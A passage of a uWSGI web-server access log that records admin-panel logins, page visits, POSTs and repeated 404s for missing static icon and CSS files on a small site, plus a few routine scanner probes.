180.160.72.163 () {40 vars in 874 bytes} [Thu Jan 14 09:23:01 2021] GET /home/ => generated 7720 bytes in 15 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1) +[pid: 11057|app: 0|req: 1274/1597] 180.160.72.163 () {40 vars in 875 bytes} [Thu Jan 14 09:23:50 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 11057|app: 0|req: 1275/1598] 180.160.72.163 () {40 vars in 882 bytes} [Thu Jan 14 09:23:51 2021] GET /my-admin/ => generated 5366 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 11057|app: 0|req: 1276/1599] 180.160.72.163 () {48 vars in 968 bytes} [Thu Jan 14 09:24:02 2021] POST /my-admin/ => generated 27 bytes in 31 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 0) +[pid: 11057|app: 0|req: 1277/1600] 180.160.72.163 () {40 vars in 889 bytes} [Thu Jan 14 09:24:02 2021] GET /admin-home/ => generated 6515 bytes in 12 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 11057|app: -1|req: -1/1601] 180.160.72.163 () {40 vars in 878 bytes} [Thu Jan 14 09:24:02 2021] GET /static/assets/plugins/bootstrap/css/bootstrap.min.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 11057|app: -1|req: -1/1602] 180.160.72.163 () {40 vars in 812 bytes} [Thu Jan 14 09:24:02 2021] GET /static/css/style.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 11057|app: -1|req: -1/1603] 180.160.72.163 () {40 vars in 841 bytes} [Thu Jan 14 09:24:02 2021] GET /static/assets/plugins/jquery/jquery.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 11057|app: -1|req: -1/1604] 180.160.72.163 () {40 vars in 824 bytes} [Thu Jan 14 09:24:02 2021] GET /static/css/colors/blue.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 11057|app: -1|req: -1/1605] 180.160.72.163 () {40 vars in 853 bytes} [Thu Jan 14 09:24:02 2021] GET /static/assets/plugins/bootstrap/js/tether.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 11057|app: -1|req: -1/1606] 180.160.72.163 () {40 vars in 859 bytes} [Thu Jan 14 09:24:02 2021] GET /static/assets/plugins/bootstrap/js/bootstrap.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 11057|app: -1|req: -1/1607] 180.160.72.163 () {40 vars in 817 bytes} [Thu Jan 14 09:24:02 2021] GET /static/js/jquery.slimscroll.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 11057|app: 0|req: 1278/1608] 180.160.72.163 () {38 vars in 848 bytes} [Thu Jan 14 09:24:02 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 14 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 11057|app: 0|req: 1279/1609] 180.160.72.163 () {38 vars in 824 bytes} [Thu Jan 14 09:24:02 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 14 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 11057|app: 0|req: 1280/1610] 180.160.72.163 () {38 vars in 824 bytes} [Thu Jan 14 09:24:02 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 13 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 11057|app: 0|req: 1281/1611] 180.160.72.163 () {38 vars in 880 bytes} [Thu Jan 14 09:24:02 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 13 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 11057|app: 0|req: 1282/1612] 180.160.72.163 () {38 vars in 772 bytes} [Thu Jan 14 09:24:02 2021] GET /static/css/spinners.css => generated 3516 bytes in 14 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 11057|app: 0|req: 1283/1613] 180.160.72.163 () {38 vars in 804 bytes} [Thu Jan 14 09:24:02 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 73 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 11057|app: 0|req: 1284/1614] 180.160.72.163 () {38 vars in 770 bytes} [Thu Jan 14 09:24:02 2021] GET /static/css/animate.css => generated 3513 bytes in 17 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 11057|app: 0|req: 1285/1615] 180.160.72.163 () {38 vars in 840 bytes} [Thu Jan 14 09:24:02 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 16 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 11057|app: -1|req: -1/1616] 180.160.72.163 () {40 vars in 793 bytes} [Thu Jan 14 09:24:03 2021] GET /static/js/waves.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 11057|app: 0|req: 1286/1617] 180.160.72.163 () {38 vars in 836 bytes} [Thu Jan 14 09:24:03 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 15 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 11057|app: -1|req: -1/1618] 180.160.72.163 () {40 vars in 805 bytes} [Thu Jan 14 09:24:03 2021] GET /static/js/sidebarmenu.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 11057|app: -1|req: -1/1619] 180.160.72.163 () {40 vars in 881 bytes} [Thu Jan 14 09:24:03 2021] GET /static/assets/plugins/sticky-kit-master/dist/sticky-kit.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 11057|app: -1|req: -1/1620] 180.160.72.163 () {40 vars in 803 bytes} [Thu Jan 14 09:24:03 2021] GET /static/js/custom.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 11057|app: -1|req: -1/1621] 180.160.72.163 () {40 vars in 877 bytes} [Thu Jan 14 09:24:03 2021] GET /static/assets/plugins/styleswitcher/jQuery.style.switcher.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 11057|app: 0|req: 1287/1622] 180.160.72.163 () {40 vars in 893 bytes} [Thu Jan 14 09:24:04 2021] GET /announcement => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 182 bytes (1 switches on core 1) +[pid: 11057|app: 0|req: 1288/1623] 180.160.72.163 () {40 vars in 895 bytes} [Thu Jan 14 09:24:04 2021] GET /announcement/ => generated 7421 bytes in 10 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 11057|app: 0|req: 1289/1624] 180.160.72.163 () {38 vars in 836 bytes} [Thu Jan 14 09:24:04 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 11 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 11057|app: 0|req: 1290/1625] 180.160.72.163 () {38 vars in 804 bytes} [Thu Jan 14 09:24:04 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 11057|app: 0|req: 1291/1626] 180.160.72.163 () {38 vars in 840 bytes} [Thu Jan 14 09:24:04 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 11057|app: 0|req: 1292/1627] 180.160.72.163 () {38 vars in 824 bytes} [Thu Jan 14 09:24:04 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 11057|app: 0|req: 1293/1628] 180.160.72.163 () {38 vars in 824 bytes} [Thu Jan 14 09:24:04 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 11057|app: 0|req: 1294/1629] 180.160.72.163 () {38 vars in 848 bytes} [Thu Jan 14 09:24:04 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 54 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 11057|app: 0|req: 1295/1630] 180.160.72.163 () {38 vars in 880 bytes} [Thu Jan 14 09:24:05 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 18 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 11057|app: 0|req: 1296/1631] 180.160.72.163 () {38 vars in 772 bytes} [Thu Jan 14 09:24:05 2021] GET /static/css/spinners.css => generated 3516 bytes in 13 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 11057|app: 0|req: 1297/1632] 180.160.72.163 () {38 vars in 770 bytes} [Thu Jan 14 09:24:05 2021] GET /static/css/animate.css => generated 3513 bytes in 13 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 11057|app: 0|req: 1298/1633] 180.160.72.163 () {40 vars in 895 bytes} [Thu Jan 14 09:24:20 2021] GET /kind-manage/ => generated 7368 bytes in 10 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 11057|app: 0|req: 1299/1634] 180.160.72.163 () {38 vars in 836 bytes} [Thu Jan 14 09:24:20 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 11057|app: 0|req: 1300/1635] 180.160.72.163 () {38 vars in 848 bytes} [Thu Jan 14 09:24:20 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 11057|app: 0|req: 1301/1636] 180.160.72.163 () {38 vars in 840 bytes} [Thu Jan 14 09:24:20 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 11057|app: 0|req: 1302/1637] 180.160.72.163 () {38 vars in 804 bytes} [Thu Jan 14 09:24:20 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 11057|app: 0|req: 1303/1638] 180.160.72.163 () {38 vars in 824 bytes} [Thu Jan 14 09:24:20 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 11057|app: 0|req: 1304/1639] 180.160.72.163 () {38 vars in 824 bytes} [Thu Jan 14 09:24:20 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 23 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 11057|app: 0|req: 1305/1640] 180.160.72.163 () {38 vars in 880 bytes} [Thu Jan 14 09:24:20 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 11057|app: 0|req: 1306/1641] 180.160.72.163 () {38 vars in 770 bytes} [Thu Jan 14 09:24:20 2021] GET /static/css/spinners.css => generated 3516 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 11057|app: 0|req: 1307/1642] 180.160.72.163 () {38 vars in 768 bytes} [Thu Jan 14 09:24:20 2021] GET /static/css/animate.css => generated 3513 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 11057|app: 0|req: 1309/1643] 180.160.72.163 () {40 vars in 895 bytes} [Thu Jan 14 09:24:39 2021] GET /kind-manage/? => generated 7368 bytes in 13 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 11057|app: 0|req: 1309/1644] 180.160.72.163 () {48 vars in 977 bytes} [Thu Jan 14 09:24:39 2021] POST /kind-manage/ => generated 27 bytes in 24 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 11057|app: 0|req: 1310/1645] 180.160.72.163 () {38 vars in 836 bytes} [Thu Jan 14 09:24:39 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 11057|app: 0|req: 1311/1646] 180.160.72.163 () {38 vars in 880 bytes} [Thu Jan 14 09:24:39 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 11057|app: 0|req: 1312/1647] 180.160.72.163 () {38 vars in 848 bytes} [Thu Jan 14 09:24:39 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 11057|app: 0|req: 1313/1648] 180.160.72.163 () {38 vars in 770 bytes} [Thu Jan 14 09:24:39 2021] GET /static/css/animate.css => generated 3513 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 11057|app: 0|req: 1314/1649] 180.160.72.163 () {38 vars in 804 bytes} [Thu Jan 14 09:24:39 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 11057|app: 0|req: 1315/1650] 180.160.72.163 () {38 vars in 840 bytes} [Thu Jan 14 09:24:39 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 19 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 11057|app: 0|req: 1316/1651] 180.160.72.163 () {38 vars in 824 bytes} [Thu Jan 14 09:24:39 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 11057|app: 0|req: 1317/1652] 180.160.72.163 () {38 vars in 824 bytes} [Thu Jan 14 09:24:39 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 11057|app: 0|req: 1318/1653] 180.160.72.163 () {38 vars in 772 bytes} [Thu Jan 14 09:24:39 2021] GET /static/css/spinners.css => generated 3516 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 11057|app: 0|req: 1319/1654] 180.160.72.163 () {40 vars in 895 bytes} [Thu Jan 14 09:24:42 2021] GET /kind-manage/ => generated 8307 bytes in 10 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 11057|app: 0|req: 1320/1655] 180.160.72.163 () {38 vars in 836 bytes} [Thu Jan 14 09:24:42 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 11057|app: 0|req: 1321/1656] 180.160.72.163 () {38 vars in 848 bytes} [Thu Jan 14 09:24:42 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 11057|app: 0|req: 1322/1657] 180.160.72.163 () {38 vars in 840 bytes} [Thu Jan 14 09:24:42 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 11057|app: 0|req: 1323/1658] 180.160.72.163 () {38 vars in 824 bytes} [Thu Jan 14 09:24:42 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 11057|app: 0|req: 1324/1659] 180.160.72.163 () {38 vars in 824 bytes} [Thu Jan 14 09:24:42 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 11057|app: 0|req: 1325/1660] 180.160.72.163 () {38 vars in 804 bytes} [Thu Jan 14 09:24:42 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 15 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 11057|app: 0|req: 1326/1661] 180.160.72.163 () {38 vars in 880 bytes} [Thu Jan 14 09:24:42 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 11057|app: 0|req: 1327/1662] 180.160.72.163 () {38 vars in 772 bytes} [Thu Jan 14 09:24:42 2021] GET /static/css/spinners.css => generated 3516 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 11057|app: 0|req: 1328/1663] 180.160.72.163 () {38 vars in 770 bytes} [Thu Jan 14 09:24:42 2021] GET /static/css/animate.css => generated 3513 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: / +[pid: 11057|app: 0|req: 1329/1664] 83.97.20.29 () {26 vars in 279 bytes} [Thu Jan 14 09:28:59 2021] GET / => generated 3429 bytes in 5 msecs (HTTP/1.0 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /http:/112.124.42.80:63435/ +[pid: 11057|app: 0|req: 1330/1665] 60.191.125.35 () {34 vars in 625 bytes} [Thu Jan 14 09:51:12 2021] HEAD http://112.124.42.80:63435/ => generated 1698 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: / +[pid: 11057|app: 0|req: 1331/1666] 83.97.20.29 () {26 vars in 278 bytes} [Thu Jan 14 10:10:18 2021] GET / => generated 3429 bytes in 7 msecs (HTTP/1.0 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 11057|app: 0|req: 1332/1667] 180.160.49.168 () {48 vars in 977 bytes} [Thu Jan 14 10:45:50 2021] POST /kind-manage/ => generated 27 bytes in 13 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 0) +[pid: 11057|app: 0|req: 1333/1668] 180.160.49.168 () {40 vars in 894 bytes} [Thu Jan 14 10:45:50 2021] GET /kind-manage/ => generated 7362 bytes in 10 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 11057|app: -1|req: -1/1669] 180.160.49.168 () {40 vars in 879 bytes} [Thu Jan 14 10:45:50 2021] GET /static/assets/plugins/bootstrap/css/bootstrap.min.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 11057|app: -1|req: -1/1670] 180.160.49.168 () {40 vars in 813 bytes} [Thu Jan 14 10:45:50 2021] GET /static/css/style.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 11057|app: -1|req: -1/1671] 180.160.49.168 () {40 vars in 842 bytes} [Thu Jan 14 10:45:50 2021] GET /static/assets/plugins/jquery/jquery.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 11057|app: -1|req: -1/1672] 180.160.49.168 () {40 vars in 854 bytes} [Thu Jan 14 10:45:50 2021] GET /static/assets/plugins/bootstrap/js/tether.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 11057|app: -1|req: -1/1673] 180.160.49.168 () {40 vars in 825 bytes} [Thu Jan 14 10:45:50 2021] GET /static/css/colors/blue.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 11057|app: -1|req: -1/1674] 180.160.49.168 () {40 vars in 818 bytes} [Thu Jan 14 10:45:50 2021] GET /static/js/jquery.slimscroll.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 11057|app: 0|req: 1334/1675] 180.160.49.168 () {38 vars in 836 bytes} [Thu Jan 14 10:45:50 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 11057|app: 0|req: 1335/1676] 180.160.49.168 () {38 vars in 804 bytes} [Thu Jan 14 10:45:51 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 11057|app: 0|req: 1336/1677] 180.160.49.168 () {38 vars in 824 bytes} [Thu Jan 14 10:45:51 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 11057|app: 0|req: 1337/1678] 180.160.49.168 () {38 vars in 840 bytes} [Thu Jan 14 10:45:51 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 11057|app: 0|req: 1338/1679] 180.160.49.168 () {38 vars in 880 bytes} [Thu Jan 14 10:45:51 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 11057|app: 0|req: 1339/1680] 180.160.49.168 () {38 vars in 824 bytes} [Thu Jan 14 10:45:51 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 21 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 11057|app: 0|req: 1340/1681] 180.160.49.168 () {38 vars in 772 bytes} [Thu Jan 14 10:45:51 2021] GET /static/css/spinners.css => generated 3516 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 11057|app: 0|req: 1341/1682] 180.160.49.168 () {38 vars in 770 bytes} [Thu Jan 14 10:45:51 2021] GET /static/css/animate.css => generated 3513 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 11057|app: 0|req: 1342/1683] 180.160.49.168 () {38 vars in 848 bytes} [Thu Jan 14 10:45:51 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 11057|app: -1|req: -1/1684] 180.160.49.168 () {40 vars in 794 bytes} [Thu Jan 14 10:45:51 2021] GET /static/js/waves.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 11057|app: -1|req: -1/1685] 180.160.49.168 () {40 vars in 806 bytes} [Thu Jan 14 10:45:51 2021] GET /static/js/sidebarmenu.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 11057|app: -1|req: -1/1686] 180.160.49.168 () {40 vars in 882 bytes} [Thu Jan 14 10:45:51 2021] GET /static/assets/plugins/sticky-kit-master/dist/sticky-kit.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 11057|app: -1|req: -1/1687] 180.160.49.168 () {40 vars in 804 bytes} [Thu Jan 14 10:45:51 2021] GET /static/js/custom.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 11057|app: -1|req: -1/1688] 180.160.49.168 () {40 vars in 878 bytes} [Thu Jan 14 10:45:51 2021] GET /static/assets/plugins/styleswitcher/jQuery.style.switcher.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 11057|app: -1|req: -1/1689] 180.160.49.168 () {40 vars in 860 bytes} [Thu Jan 14 10:45:51 2021] GET /static/assets/plugins/bootstrap/js/bootstrap.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 11057|app: 0|req: 1343/1690] 180.160.49.168 () {48 vars in 977 bytes} [Thu Jan 14 10:45:52 2021] POST /kind-manage/ => generated 27 bytes in 17 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 0) +[pid: 11057|app: 0|req: 1344/1691] 180.160.49.168 () {40 vars in 894 bytes} [Thu Jan 14 10:45:52 2021] GET /kind-manage/ => generated 6423 bytes in 10 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 11057|app: 0|req: 1345/1692] 180.160.49.168 () {38 vars in 836 bytes} [Thu Jan 14 10:45:52 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 11057|app: 0|req: 1346/1693] 180.160.49.168 () {38 vars in 848 bytes} [Thu Jan 14 10:45:52 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 11057|app: 0|req: 1347/1694] 180.160.49.168 () {38 vars in 804 bytes} [Thu 